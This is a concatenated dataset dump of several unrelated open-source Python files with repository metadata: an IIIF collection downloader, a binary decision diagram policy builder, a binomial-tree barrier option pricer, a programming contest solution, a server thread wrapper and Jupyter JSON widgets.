18f25a9449f162ee92945b42b93700e12fd4fd77
|
e7692808585bc7e9726f61f7f6baf43dc83e28ac
|
refs/heads/master
| 2021-10-13T08:04:48.200662
| 2016-12-20T01:59:47
| 2016-12-20T01:59:47
| 76,935,980
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 151
|
py
|
Best way to implement a simple `queue`
`Module`s everywhere!
Special attributes of objects and classes
Get the most of `int`s
Get the most of `float`s
|
[
"mattia.penati@gmail.com"
] |
mattia.penati@gmail.com
|
8ae147a4aa7b33753aea023f8e8f2d064f2e8ae8
|
aa196fe070c406ba2c1751081b9afccecb1abd5a
|
/src/04_CollectionGeneratorFromItemSets.py
|
efc7420c96eb2dcf62976975d1b8b41a8ad7e1d5
|
[] |
no_license
|
iii-dch/dataset
|
929f54285febfe7399b2ff1368da5efb7b4a0b4e
|
ebc6bf924ccb33780d55caa61a91f7db0754c4e2
|
refs/heads/master
| 2021-06-22T23:39:34.907627
| 2021-04-27T01:47:11
| 2021-04-27T01:47:11
| 175,349,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,669
|
py
|
import sys
import json
import argparse
import requests
import os
import glob
import yaml
import shutil
import datetime
from classes.downloader import Downloader
# Output directory for the generated IIIF collection JSON files.
manifest_path = "../docs/iiif/collection"
Downloader.initDir(manifest_path)

# Load site settings.  safe_load avoids arbitrary object construction, and the
# with-block closes the handle deterministically (the old code opened the file
# in "r+" for a read-only use, never closed it, and used the deprecated
# yaml.load without an explicit Loader).
with open("settings.yml") as f:
    settings = yaml.safe_load(f)
prefix = settings["github_pages_url"]
api_url = settings["api_url"]

# Use the item-set JSON-LD files as the work list.
files = glob.glob("../docs/api/item_sets/*.json")
# For every item set, fetch its IIIF collection from the Omeka endpoint and
# mirror it into the static site.  (A ~90-line block of dead, commented-out
# manifest-building code that referenced undefined names was removed.)
for i, path in enumerate(files):
    if i % 100 == 0:
        # Lightweight progress indicator for long runs.
        print(str(i + 1) + "/" + str(len(files)))
    with open(path) as f:
        obj = json.load(f)
    # `set_id` / `path` replace the originals `id` / `file`, which shadowed builtins.
    set_id = str(obj["o:id"])
    # The IIIF collection endpoint lives under /iiif instead of /api.
    url = api_url.replace(
        "/api", "/iiif") + "/collection/" + set_id
    collection = requests.get(url).json()
    # NOTE(review): no error handling — a failed request aborts the whole
    # batch; confirm that is acceptable for this job.
    output_path = "../docs/iiif/collection/{}.json".format(set_id)
    # with-block guarantees the output file is flushed and closed.
    with open(output_path, 'w') as fw:
        json.dump(collection, fw, ensure_ascii=False,
                  indent=4, sort_keys=True, separators=(',', ': '))
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
bf97ef06b952d115433a1b4263db21b5ebfb4b54
|
d056699ecbe8bcebf4ce63c7d590b7cb9eff6331
|
/old/policy.py
|
8b81fee7be775f47a04dbf2b39425032a9108a19
|
[
"MIT"
] |
permissive
|
QuMuLab/tempopem
|
66258eefb194fee0969530c8618d6de0bc08aa3e
|
1d578d9fb6b3bc87295527b152f142fe9dcd8546
|
refs/heads/master
| 2021-05-22T17:40:51.131378
| 2020-04-04T15:02:29
| 2020-04-04T15:02:29
| 253,025,451
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,344
|
py
|
import networkx as nx
# Module-wide tally of every node ever constructed (for reporting).
NODE_COUNT = 0

class PolicyNode(object):
    """Base node of the policy BDD.

    Inner nodes branch on a fluent; leaf nodes carry an action.  Subclasses
    must provide id() (a stable integer), which doubles as the hash.
    Equality is hash-based: two nodes compare equal iff their ids match.
    """
    def __init__(self):
        global NODE_COUNT
        NODE_COUNT += 1
        self.high = None      # child followed when the fluent holds
        self.low = None       # child followed when the fluent does not hold
        self.fluent = None    # set by InnerNode
        self.action = None    # set by LeafNode (False marks the failure sink)
        self.parents = []
        self.hash_val = None  # lazy cache for id()
        self.score = None     # coverage memo (see compute_coverage)
    def is_true(self):
        # A "true" node carries a real action (not None, not the False sink).
        return (self.action is not None) and (self.action is not False)
    def is_false(self):
        return False == self.action
    def set_high(self, high):
        self.high = high
        high.add_parent(self)
    def set_low(self, low):
        self.low = low
        low.add_parent(self)
    def add_parent(self, p):
        self.parents.append(p)
    def __repr__(self):
        return self.__str__()
    def __hash__(self):
        return self.id()
    def __cmp__(self, other):
        # NOTE(review): despite the name this returns an equality boolean,
        # not the -1/0/1 of the old __cmp__ protocol — confirm intended.
        return self.__hash__() == other.__hash__()
    def __eq__(self, other):
        return self.__cmp__(other)
    def __ne__(self, other):
        # Bug fix: this was misspelled __neq__, which Python never calls.
        return not self.__cmp__(other)
class InnerNode(PolicyNode):
    """Decision node that branches on a single fluent."""
    def __init__(self, fluent):
        PolicyNode.__init__(self)
        self.fluent = fluent
    def label(self):
        return str(self.fluent)
    def id(self):
        # Cache the structural hash: fluent plus the two children.
        if self.hash_val is not None:
            return self.hash_val
        key = "%s/%d/%d" % (str(self.fluent), hash(self.high), hash(self.low))
        self.hash_val = hash(key)
        return self.hash_val
    def __str__(self):
        return "(%s: %s / %s)" % (str(self.fluent), str(self.high), str(self.low))
class LeafNode(PolicyNode):
    """Terminal node carrying an action (or False for the failure sink).

    Both children point back at the node itself so traversal code never
    has to special-case leaves.
    """
    def __init__(self, action):
        PolicyNode.__init__(self)
        self.action = action
        self.high = self
        self.low = self
    def label(self):
        return str(self.action)
    def id(self):
        if self.hash_val is not None:
            return self.hash_val
        self.hash_val = hash(self.label())
        return self.hash_val
    def __str__(self):
        return str(self.action)
# Shared failure sink reused by every policy (compared with ==/is below).
FALSE = LeafNode(False)
LOOKUP_TABLE = {} # ITE memo table: "fg_id/h_id" pair key -> combined root node
NODE_LOOKUP = {} # Hash-consing table: "fluent/hash(high)/hash(low)" key -> existing node
def compute_coverage(policy, max_depth, depth):
    """Memoized count of covered states in the subtree below *policy*.

    A non-FALSE leaf at this depth covers the full remaining subtree,
    2**(max_depth - depth - 1) states; FALSE covers nothing; inner nodes
    recurse.  The result is cached on policy.score.
    """
    if policy.score:
        return policy.score

    def branch_score(child):
        if child.__class__ == InnerNode:
            return compute_coverage(child, max_depth, depth + 1)
        if child is FALSE:
            return 0
        return 2 ** (max_depth - depth - 1)

    policy.score = branch_score(policy.high) + branch_score(policy.low)
    return policy.score
def generate_graph(policy):
    """Materialize the policy DAG rooted at *policy* as a networkx.DiGraph.

    Edge attribute 'high' is 1 for the high branch, 0 for the low branch,
    and -1 when both branches lead to the same child.
    """
    graph = nx.DiGraph()
    seen = set()
    pending = [policy]
    while pending:
        node = pending.pop()
        if node in seen:
            continue
        seen.add(node)
        graph.add_node(node)
        if node.__class__ == InnerNode:
            pending.append(node.high)
            pending.append(node.low)
            if node.high == node.low:
                graph.add_edge(node, node.high, high = -1)
            else:
                graph.add_edge(node, node.high, high = 1)
                graph.add_edge(node, node.low, high = 0)
    return graph
def generate_dot(policy, graph = None):
    """Render the policy DAG in Graphviz dot syntax.

    Solid arrows are high branches, dotted arrows are low branches; an edge
    tagged -1 (shared child) is drawn in both styles.  Self-loops (leaves)
    are skipped.
    """
    if not graph:
        graph = generate_graph(policy)
    lines = ["", "digraph Policy {"]
    for node in graph.nodes():
        lines.append(" %d [label=\"%s\"];" % (hash(node), node.label()))
    for (src, dst) in graph.edges():
        if hash(src) == hash(dst):
            continue
        kind = graph.get_edge_data(src, dst)['high']
        if kind != 0:
            lines.append(" %d -> %d;" % (hash(src), hash(dst)))
        if kind != 1:
            lines.append(" %d -> %d [style=dotted];" % (hash(src), hash(dst)))
    lines.append("}")
    return "\n".join(lines) + "\n"
def generate_dump(policy, graph = None):
    """Serialize the policy DAG to the flat text interchange format.

    Layout: fluent count, root id, node count, one "id/label" line per
    node, edge count, then one "src/dst/h" or "src/dst/l" line per edge
    (self-loops excluded; a -1 edge emits both an h and an l line).
    """
    if not graph:
        graph = generate_graph(policy)
    header = ["%d" % policy.num_fluents,
              "%d" % policy.id(),
              "%d" % graph.number_of_nodes()]
    node_lines = ["%d/%s" % (node.id(), node.label()) for node in graph.nodes()]
    edge_lines = []
    for (src, dst) in graph.edges():
        if hash(src) == hash(dst):
            continue
        kind = graph.get_edge_data(src, dst)['high']
        if kind != 0:
            edge_lines.append("%d/%d/h" % (src.id(), dst.id()))
        if kind != 1:
            edge_lines.append("%d/%d/l" % (src.id(), dst.id()))
    parts = header + node_lines + ["%d" % len(edge_lines)] + edge_lines
    return "\n".join(parts) + "\n"
def generate_stats(policy, graph = None):
    """Return a (node_count, edge_count) pair for the policy DAG."""
    graph = graph or generate_graph(policy)
    return (graph.number_of_nodes(), graph.number_of_edges())
def ITE(fg, h):
    """If-Then-Else composition of two policy BDD nodes.

    Merges *fg* (preferred) with fallback *h*, memoizing on the node-id
    pair in LOOKUP_TABLE and hash-consing result nodes in NODE_LOOKUP so
    structurally identical subtrees are shared.  Both arguments must
    branch on the same fluent when both are inner nodes.

    (print statements were parenthesized for Python-2/3 portability and
    dead commented-out debug prints were removed; logic is unchanged.)
    """
    global FALSE, LOOKUP_TABLE, NODE_LOOKUP
    if (fg.__class__ == InnerNode) and (h.__class__ == InnerNode):
        if not (fg.fluent == h.fluent):
            # Dump the mismatching fluents before the assert fires.
            print(fg.fluent)
            print(h.fluent)
        assert fg.fluent == h.fluent
    # Base cases
    if fg.is_true():
        return fg
    if FALSE == fg:
        return h
    if FALSE == h:
        return fg
    if fg.id() == h.id():
        return h
    # Check the memo table for the (fg, h) pair
    hash_val = "%d/%d" % (fg.id(), h.id())
    if hash_val in LOOKUP_TABLE:
        return LOOKUP_TABLE[hash_val]
    T = ITE(fg.high, h.high)
    E = ITE(fg.low, h.low)
    # Hash-cons the result node to avoid re-creating identical nodes.
    new_node_key = "%s/%d/%d" % (str(fg.fluent), hash(T), hash(E))
    if new_node_key in NODE_LOOKUP:
        root = NODE_LOOKUP[new_node_key]
    else:
        root = InnerNode(fg.fluent)
        root.set_high(T)
        if T.id() == E.id():
            root.set_low(T)
        else:
            root.set_low(E)
        NODE_LOOKUP[new_node_key] = root
    # Insert (fg, h) -> root into the memo table
    LOOKUP_TABLE[hash_val] = root
    return root
def generate_primitive_policy(prec_set, ordering):
    """Build a chain-shaped BDD that yields prec_set.candidate exactly when
    every fluent in prec_set.prec holds.

    The chain follows *ordering*: fluents outside the precondition are
    don't-cares (high and low both continue), while a required fluent sends
    its low branch to FALSE.  Returns None (after logging) if the ordering
    does not cover the whole precondition set.
    """
    # Bug fix: work on a copy — the original aliased prec_set.prec and
    # emptied the caller's precondition set via remove().
    unseen = list(prec_set.prec)
    if not unseen:
        return LeafNode(prec_set.candidate)
    prev_f = ordering[0]
    current = InnerNode(prev_f)
    root = current
    for f in ordering[1:]:
        if prev_f in unseen:
            saw_previous = True
            unseen.remove(prev_f)
        else:
            saw_previous = False
        if 0 == len(unseen):
            # Every required fluent is on the path: terminate with the action.
            act_node = LeafNode(prec_set.candidate)
            current.set_high(act_node)
            current.set_low(FALSE)
            return root
        choice = InnerNode(f)
        current.set_high(choice)
        if saw_previous:
            current.set_low(FALSE)
        else:
            current.set_low(choice)
        current = choice
        prev_f = f
    if prev_f in unseen:
        unseen.remove(prev_f)
    if 0 == len(unseen):
        act_node = LeafNode(prec_set.candidate)
        current.set_high(act_node)
        current.set_low(FALSE)
        return root
    print("Error: Prec set wasn't used up by the ordering: %s / %s" % (str(prec_set), str(ordering)))
    return None
def generate_variable_ordering(reg_list, mapping):
    """Return a deterministic fluent ordering for the policy BDD.

    Fluents are grouped by first appearance while walking reg_list /
    mapping, and sorted alphabetically (by str()) within each group.
    """
    seen = set()
    ordering = []
    for r in reg_list:
        for item in r:
            for ps in mapping[item]:
                new_vars = set(ps.prec) - seen
                # key=str is the Python-3-compatible equivalent of the old
                # cmp=lambda x,y: cmp(str(x), str(y)) (removed in Python 3).
                ordering.extend(sorted(new_vars, key=str))
                seen |= new_vars
    return ordering
def generate_policy(reg_list, mapping):
    """Fold every primitive policy into a single BDD via iterated ITE.

    Resets the ITE memo table, fixes a global variable ordering, builds one
    chain policy per precondition set, then merges them with ITE while
    printing coarse progress.  (Removed an unused `import sys`, dead debug
    comments, and parenthesized prints for Python-2/3 portability.)
    """
    global LOOKUP_TABLE
    LOOKUP_TABLE = {}
    # NOTE(review): NODE_LOOKUP is *not* reset here — confirm nodes are
    # meant to be shared across successive generate_policy calls.
    # Get the ordering
    ordering = generate_variable_ordering(reg_list, mapping)
    # Generate all of the primitive policies
    prim_policies = []
    for r in reg_list:
        for item in r:
            for ps in mapping[item]:
                prim_policies.append(generate_primitive_policy(ps, ordering))
    # Iteratively create our large policy
    policy = prim_policies.pop(0)
    print("Iteratively building the ITE...")
    last = 0.0
    top_num = float(len(prim_policies))
    while prim_policies:
        progress = (top_num - float(len(prim_policies))) / top_num
        if progress + 0.1 > last:
            last += 0.1
            print("%3.1f%% Complete" % (progress * 100))
        policy = ITE(policy, prim_policies.pop(0))
    print("\nNodes used: %d\n" % NODE_COUNT)
    policy.num_fluents = len(ordering)
    return policy
|
[
"christian.muise@gmail.com"
] |
christian.muise@gmail.com
|
4914ad00a676e04f4ad6a79cb4558ee4d81d7cf5
|
a61136759e6af85ca4b0a5c3e0de5885bca50406
|
/IndividualOptions/BarrierOptions/BarrierKnockInCallPut4.py
|
7f00e14186191835be9f0a4eb069eb87a14338d8
|
[] |
no_license
|
JorisVlaar/F4E-Project-Part-2-Group-29
|
c626436ce0f557cda17377ea8b8d33f54935ff1b
|
7c2d28e770ab89ed8371f2c97839ba966cb7a253
|
refs/heads/main
| 2023-09-02T08:15:45.385603
| 2021-11-02T11:56:30
| 2021-11-02T11:56:30
| 416,730,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,130
|
py
|
# A Program to find the value of an EU Call option using the binomial tree method
from Tool import findStockPrices as fsp
import math
def find_values(prices, PExercise, option):
    """Replace each terminal stock price with the option payoff, in place.

    "Call" pays max(0, S - K); "Put" pays max(0, K - S); any other option
    string leaves the prices untouched.  Returns the same (mutated) list.
    """
    if option == "Call":
        for idx, price in enumerate(prices):
            prices[idx] = max(0, price - PExercise)
    elif option == "Put":
        for idx, price in enumerate(prices):
            prices[idx] = max(0, PExercise - price)
    return prices
def find_value(prices, periods, q, R):
    """Backward-induct terminal payoffs through the binomial tree.

    Each pass discounts the risk-neutral expectation (q up / 1-q down) by
    1/R and shrinks the level by one node; after *periods* passes a
    single-element list with the root value remains.
    """
    level = prices
    for width in range(periods, 0, -1):
        level = [
            ((q * level[k]) + ((1 - q) * level[k + 1])) * (1 / R)
            for k in range(width)
        ]
    return level
def find_line_position(KIPrice, PStock, u, d):
    """Count tree moves between the current stock price and the barrier.

    Counts up-moves (factor u) when the knock-in barrier lies above the
    stock price, down-moves (factor d) when it lies below, and 0 when the
    two coincide.
    """
    position = 0
    level = PStock
    if KIPrice > PStock:
        # Barrier above: multiply up until one more step would cross it.
        while level * u < KIPrice:
            position += 1
            level = level * u
    elif KIPrice < PStock:
        # Barrier below: multiply down symmetrically.
        while level * d > KIPrice:
            position += 1
            level = level * d
    return position
def find_paths(periods):
    """Return path counts to each terminal node after *periods* steps.

    This is row *periods* of Pascal's triangle, [C(n,0) .. C(n,n)],
    built iteratively; periods == 0 yields an empty list (matching the
    original behaviour).
    """
    row = []
    for _ in range(periods):
        nxt = [1]
        nxt.extend(row[j] + row[j + 1] for j in range(len(row) - 1))
        nxt.append(1)
        row = nxt
    return row
def find_paths_via(lines, step):
    """Count binomial-tree paths that pass through the barrier region.

    Runs two passes of the same triangular accumulation: each pass grows a
    Pascal-style row in `previous` (width step+1) for `lines` levels and
    adds every entry into `paths`.  The second pass repeats the process for
    one fewer level with `previous` cleared.

    NOTE(review): `step2` is NOT reset between the two passes, so leftover
    state from the first pass feeds the second — confirm this is intended
    and not a copy/paste artefact (the two loop bodies are identical).
    """
    paths = 0
    previous = []
    step2 = 0
    # First pass over `lines` tree levels.
    for i in range(1, int(lines) + 1):
        if i == 1:
            paths += 1
        elif i == 2:
            # Seed the row with step+1 ones, counting each as a path.
            for j in range(1, step + 2):
                paths += 1
                previous.append(1)
        elif i > 2:
            # Accumulate the running row total, then replace each entry with
            # the sum of itself and everything to its right.
            for k in previous:
                step2 += k
            for j in range(0, step + 1):
                paths += step2
                pop = previous.pop(j)
                previous.insert(j, step2)
                step2 -= pop
    # Second pass: one fewer level, row rebuilt from scratch.
    lines -= 1
    previous.clear()
    for i in range(1, int(lines) + 1):
        if i == 1:
            paths += 1
        elif i == 2:
            for j in range(1, step + 2):
                paths += 1
                previous.append(1)
        elif i > 2:
            for k in previous:
                step2 += k
            for j in range(0, step + 1):
                paths += step2
                pop = previous.pop(j)
                previous.insert(j, step2)
                step2 -= pop
    return paths
def some_name(prices, periods, KIPrice, PStock, linePosition):
    """Per-terminal-node counts of paths that hit the knock-in barrier.

    Nodes fully beyond the barrier take the plain binomial path count
    (find_paths); nodes in the transition band take find_paths_via counts;
    the remainder are 0.  The list is aligned with *prices* (descending
    terminal prices), handling a barrier above or below the spot.

    Changes from the original: removed a stray debug print inside the
    first branch and hoisted the loop-invariant find_paths(periods) call.
    NOTE(review): returns None when KIPrice == PStock — confirm callers
    never hit that case.
    """
    lines = int(periods/2)
    step = lines
    if periods % 2 == 0:
        step -= 1
    # Walk the barrier position inward, alternately shrinking lines/step.
    for i in range(1, 1 + linePosition):
        if periods % 2 == 0:
            if i % 2 == 0:
                step -= 1
            else:
                lines -= 1
        else:
            if i % 2 == 0:
                lines -= 1
            else:
                step -= 1
    if lines <= 0:
        lines = 0
    if step <= 0:
        step = 0
    actualPrices = []
    all_paths = find_paths(periods)  # loop-invariant binomial counts
    if KIPrice > PStock:
        index = 0
        for k in prices:
            if k >= KIPrice:
                actualPrices.append(all_paths[index])
                index += 1
        linesCopy = lines
        for i in range(linesCopy):
            actualPrices.append(find_paths_via(lines, step))
            index += 1
            lines -= 1
            step += 1
            if lines == 1:
                step = 0
        # Pad the remaining (unreachable) nodes with zero paths.
        for j in range(len(actualPrices), len(prices)):
            actualPrices.append(0)
        return actualPrices
    elif KIPrice < PStock:
        index = len(prices) - 1
        for k in prices:
            if k <= KIPrice:
                actualPrices.append(all_paths[index])
                index -= 1
        actualPrices.reverse()
        linesCopy = lines
        for i in range(linesCopy):
            actualPrices.append(find_paths_via(lines, step))
            index -= 1
            lines -= 1
            step += 1
            if lines == 1:
                step = 0
        for j in range(len(actualPrices), len(prices)):
            actualPrices.append(0)
        actualPrices.reverse()
        return actualPrices
def find_value_probability(prices, paths, pathsVia, R, periods):
    """Discounted expected payoff weighted by knock-in path probabilities.

    Each payoff is discounted by R**periods and weighted by the fraction of
    total binomial paths (sum of *paths*) that knock in (pathsVia[i]).
    """
    total_paths = sum(paths)
    expected = 0
    for i, payoff in enumerate(prices):
        expected += (payoff / pow(R, periods)) * (pathsVia[i] / total_paths)
    return expected
# inputs: contract and market parameters for the knock-in barrier option.
PStock = 41
PExercise = 37
KnockInPrice = 42
volatility = 0.4
maturity = 90 / 365
periodLength = 30 / 365
interest = 0.1
opttype = "Put" # Option type: "Call" or "Put" (find_values matches the full word)
# computed values: CRR binomial-tree parameters derived from the inputs.
periods = int(maturity / periodLength)
u = math.exp(volatility * math.sqrt(periodLength))
d = 1 / u
R = math.exp(interest * periodLength)
q = (R - d) / (u - d)
# Terminal stock prices and their payoffs (copy so stockPrices survives).
stockPrices = fsp.find_final_prices(PStock, u, d, periods)
optionPayOff = find_values(list.copy(stockPrices), PExercise, opttype)
print(stockPrices)
print(optionPayOff)
# Plain (non-barrier) option value via backward induction.
print(find_value(optionPayOff, periods, q, R)[0])
print("-------")
# Knock-in path counts per terminal node, then the barrier-adjusted value.
print(some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)))
print(find_value_probability(optionPayOff, find_paths(periods), some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)), R, periods))
# Convergence experiment (disabled): sweep the number of periods 5..80 and
# track the largest barrier-adjusted value.
# value = 100000000000000000000000
# periods = 5
# while periods <= 80:
#     print(periods)
#     periodLength = maturity/periods
#     u = math.exp(volatility * math.sqrt(periodLength))
#     d = 1 / u
#     R = math.exp(interest * periodLength)
#     q = (R - d) / (u - d)
#     stockPrices = fsp.find_final_prices(PStock, u, d, periods)
#     optionPayOff = find_values(list.copy(stockPrices), PExercise, opttype)
#     value1 = find_value_probability(optionPayOff, find_paths(periods), some_name(stockPrices, periods, KnockInPrice, PStock, find_line_position(KnockInPrice, PStock, u, d)), R, periods)
#     print(value1)
#     if value1 > value:
#         value = value1
#     periods += 1
#
# print("-------")
# print(value)
|
[
"j.f.vlaar@student.utwente.nl"
] |
j.f.vlaar@student.utwente.nl
|
a86c159050ee04f45dbaea716accb29cd8f21b10
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5631572862566400_0/Python/Yaksha/C.py
|
42b9cbfef65ada5bb000995cbdc1565d9b560d9e
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,372
|
py
|
def solveEndedLoops(endedLoops):
    """Longest duplicate-free chain built from one or two ended loops.

    Tries every loop on its own, and every ordered pair of distinct loops
    where the second is reversed and overlapped on the first loop's last
    element; chains containing a repeated element are rejected.
    """
    best = 0
    reversed_loops = [loop[::-1] for loop in endedLoops]
    for i, head in enumerate(endedLoops):
        best = max(best, len(head))
        for j, tail in enumerate(reversed_loops):
            if i == j:
                continue
            # Even a maximally overlapping join cannot beat the current best.
            if len(head) + len(tail) - 1 < best:
                continue
            if head[-1] in tail:
                cut = tail.index(head[-1])
                combined = head + tail[cut + 1:]
            else:
                combined = head + tail
            if len(combined) >= best and len(combined) == len(set(combined)):
                best = max(best, len(combined))
    return best
def solveloops(n, BFF):
    """Largest valid circle of kids given each kid's best friend.

    Classifies every kid's BFF-chain as a closed mutual pair, a larger
    circular loop, or an "ended" chain terminating in a mutual pair, then
    takes the best of: number of closed pairs, longest circular loop, and
    the longest combination of ended chains (solveEndedLoops).

    Changes from the original: removed three leftover debug prints that
    polluted stdout, and renamed the local `next` (shadowed the builtin).
    """
    BFF = [-1] + BFF  # pad so kids are 1-indexed like the input
    circularLoops = []
    endedloops = []
    closedPairs = []
    for i in range(1, len(BFF)):
        loop = [i]
        nxt = BFF[i]
        while True:
            if len(loop) == 2 and nxt == loop[0]:
                closedPairs.append(loop)
                break
            if len(loop) > 2 and nxt == loop[0]:
                circularLoops.append(loop)
                break
            if len(loop) > 2 and nxt == loop[-2]:
                endedloops.append(loop)
                break
            if nxt in loop:
                # Chain re-enters itself elsewhere: not a usable loop from i.
                break
            loop.append(nxt)
            nxt = BFF[nxt]
    maxClosedPairs = len(closedPairs)
    if circularLoops:
        maxCircurlarLoops = max([len(x) for x in circularLoops])
    else:
        maxCircurlarLoops = 0
    maxEndedLoops = solveEndedLoops(endedloops)
    return max([maxClosedPairs, maxCircurlarLoops, maxEndedLoops])
# Driver: read the Code Jam input file and write one answer line per case.
FILENAME = "C-small-attempt2"
with open(FILENAME + ".in") as infile:
    with open(FILENAME + ".out", 'w') as outfile:
        numCases = int(infile.readline())
        for i in range(numCases):
            # Each case: one line with the kid count, one line of BFF indices.
            numKids = int(infile.readline())
            bffs = infile.readline().split()
            bffs = [int(x) for x in bffs]
            outfile.write("Case #%d: %s\n" % (i + 1, solveloops(numKids, bffs)))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
d2bd8e2345dc2cf48c72ef12d9b46d5b9429970c
|
50c7d7f94263b250bba1ded2b247925ff4e28cf8
|
/server/marsHandler.py
|
b96b6048794c4275cb2580e66a13e9bfd1ffe581
|
[
"MIT"
] |
permissive
|
jmaggio14/goddard
|
8bce241ed19b27249b3707f98784bbf13c90d0ea
|
f34755c9fbd982b2965d9b23685df0f21ebaff08
|
refs/heads/master
| 2021-01-12T13:25:32.669157
| 2016-09-25T18:43:23
| 2016-09-25T18:43:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
# Copyright (c) 2016, Jeffrey Maggio and Joseph Bartelmo
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
# LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import threading
import sys
import logging
from select import select
sys.path.insert(0, '../mars')
import run as Mars #note as long as __main__ is defined this will write a usage violation to the console
MARS_EXIT_COMMAND = 'exit'


class MarsThread(threading.Thread):
    """Background thread that keeps Mars running across client reconnects.

    All communication with Mars goes through the queues handed to the
    constructor, so a client can drop and reattach without stopping Mars;
    Mars only exits when stop() queues the exit command or its own
    watchdog fires.
    """

    def __init__(self, configuration, marsCommandQueue, marsConnectionQueue, marsOnlineQueue, debugEnabled = False):
        super(MarsThread, self).__init__()
        self._stop = threading.Event()
        self.config = configuration
        self.marsCommandQueue = marsCommandQueue
        self.marsConnectionQueue = marsConnectionQueue
        self.marsOnlineQueue = marsOnlineQueue
        self.debugEnabled = debugEnabled

    def run(self):
        Mars.run(self.config, self.marsCommandQueue, self.marsConnectionQueue, self.marsOnlineQueue, self.debugEnabled)
        # Mars has exited, but the server (and its logging) lives on; drop
        # every handler so they are not duplicated on the next launch.
        for logger_name in ('mars_logging', 'telemetry_logging'):
            logging.getLogger(logger_name).handlers = []

    def stop(self):
        """Ask Mars to shut down by queueing the exit command."""
        self.marsCommandQueue.put(MARS_EXIT_COMMAND)
|
[
"joebartelmo@gmail.com"
] |
joebartelmo@gmail.com
|
604a43b12f74c9ec9bf3bce3255baee25371282e
|
d445c40666165b0fea9b7cb00de882b5aaa7882a
|
/src/py/wxyz_core/src/wxyz/core/widget_json.py
|
cb607e01ded9e0ce61065d5b17a69e59b9b01c42
|
[
"BSD-3-Clause"
] |
permissive
|
nrbgt/wxyz
|
9e5d995b4eb76ddbdd459940ecefe6d5a5c326d3
|
663cf6593f4c0ca12f7b94b61e34c0a8d3cbcdfd
|
refs/heads/master
| 2023-05-13T07:55:19.518188
| 2020-02-23T02:07:17
| 2020-02-23T02:07:17
| 296,402,747
| 1
| 0
|
BSD-3-Clause
| 2020-09-17T17:56:30
| 2020-09-17T17:56:29
| null |
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
""" Widgets for working with JSON
"""
# pylint: disable=no-self-use
import json
import jsonpointer
import jsonschema
from .base import Fn, T, W
@W.register
class JSON(Fn):
    """Functional widget that parses JSON text.

    The parsed result lands in ``value``, which accepts any
    JSON-representable type (or None).  The input text presumably arrives
    via a trait on the ``Fn`` base — confirm against ``.base``.
    """
    _model_name = T.Unicode("JSONModel").tag(sync=True)
    # Parsed output, synced to the front end.
    value = T.Union(
        [T.Dict(), T.List(), T.Unicode(), T.Int(), T.Float()], allow_none=True
    ).tag(sync=True)
    def the_function(self, source):
        """Parse *source* as JSON and return the resulting value.

        Raises ``json.JSONDecodeError`` on malformed input.
        """
        return json.loads(source)
@W.register
class JSONPointer(Fn):
    """Functional widget that resolves an RFC 6901 JSON Pointer.

    Recomputes whenever ``source`` or ``pointer`` changes (see
    ``_observed_traits``).
    """
    _model_name = T.Unicode("JSONPointerModel").tag(sync=True)
    # Document to resolve against.
    source = T.Dict(allow_none=True).tag(sync=True)
    # Pointer expression, e.g. "/foo/0/bar".
    pointer = T.Unicode(allow_none=True).tag(sync=True)
    _observed_traits = ["source", "pointer"]
    def the_function(self, source, pointer):
        """Return the value *pointer* addresses inside *source*.

        Raises ``jsonpointer.JsonPointerException`` when the path is absent.
        """
        return jsonpointer.resolve_pointer(source, pointer)
@W.register
class JSONSchema(Fn):
    """Functional widget that validates a document against a JSON Schema.

    On success the untouched ``source`` is passed through to ``value``;
    recomputes whenever ``source`` or ``schema`` changes.
    """
    _model_name = T.Unicode("JSONSchemaModel").tag(sync=True)
    # Document under validation.
    source = T.Dict(allow_none=True).tag(sync=True)
    # JSON Schema to validate against.
    schema = T.Dict(allow_none=True).tag(sync=True)
    # The validated document (unchanged copy of source on success).
    value = T.Dict(allow_none=True).tag(sync=True)
    _observed_traits = ["source", "schema"]
    def the_function(self, source, schema):
        """Validate *source* against *schema* and return *source*.

        Raises ``jsonschema.ValidationError`` when validation fails.
        """
        jsonschema.validate(source, schema)
        return source
|
[
"nick.bollweg@gmail.com"
] |
nick.bollweg@gmail.com
|
c1aaf6c50d07538695d2394c07416afb1c37b478
|
44ff65fdce9ba204bbc1673c2bec1cc46e70bda5
|
/projeto/dimensoes/migrations/0001_initial.py
|
c2c840d1fcaf8141e410eff1c5508d32a38bb974
|
[] |
no_license
|
leopesi/pool_budget
|
